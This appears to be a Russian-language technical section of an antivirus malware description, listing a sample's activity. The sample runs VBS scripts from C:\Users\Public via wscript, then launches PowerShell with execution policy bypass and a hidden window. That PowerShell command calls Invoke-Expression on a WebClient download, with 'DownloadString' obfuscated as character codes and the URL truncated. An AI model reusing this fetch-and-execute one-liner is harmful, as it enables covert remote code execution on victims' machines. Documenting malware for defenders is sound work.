Техническая информация
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\f1.vbs"
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\este.vbs"
- C:\users\public\f1.vbs
- C:\users\public\este.vbs
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\este.vbs"' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://'...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://'...